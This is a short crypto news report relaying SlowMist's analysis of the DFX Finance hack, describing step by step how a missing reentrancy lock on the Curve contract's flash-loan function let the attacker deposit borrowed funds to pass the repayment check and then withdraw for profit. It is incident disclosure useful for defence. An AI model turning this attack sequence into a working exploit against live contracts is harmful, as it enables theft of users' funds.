Slow Fog: DFX Finance Attacked Due to Lack of Reentrancy Protection in Curve Contract Flash Loan Function
ChainCatcher news, according to intelligence from the SlowMist security team, the DFX Finance project on the ETH chain was attacked, resulting in the attacker profiting approximately $231,138. The SlowMist security team shared the following in a brief:
The attacker first called the viewDeposit function in a contract named Curve to check the deposit status in the contract, and then constructed the appropriate amount of money to borrow for the flash loan based on the returned deposit status.
Next, they continued with the flash function of the Curve contract for the flash loan. Since this function did not have reentrancy lock protection, the attacker utilized the flashCallback function in the flash loan to call the deposit function of the contract for depositing.
The deposit function externally called the proportionalDeposit function of the ProportionalLiquidity contract, which transferred the funds borrowed in step two back to the Curve contract, recorded the deposit for the attacking contract, and minted deposit receipts for the attacking contract.
By reentering the deposit function to transfer funds back to the Curve contract, the attacker successfully passed the balance check for the flash loan repayment.
Finally, they called the withdraw function to make a withdrawal. During the withdrawal, the deposit receipt recorded for the attacking contract in step three was burned, allowing them to successfully withdraw approximately 2,283,092,402 XIDR tokens and 99,866 USDC tokens for profit.
The main reason for this attack was that the flash loan function of the Curve contract did not implement reentrancy protection, allowing the attacker to reenter the deposit function to transfer tokens and pass the balance check for the flash loan repayment. Since there was a record during the deposit, the attacker could successfully withdraw and profit. (source link)
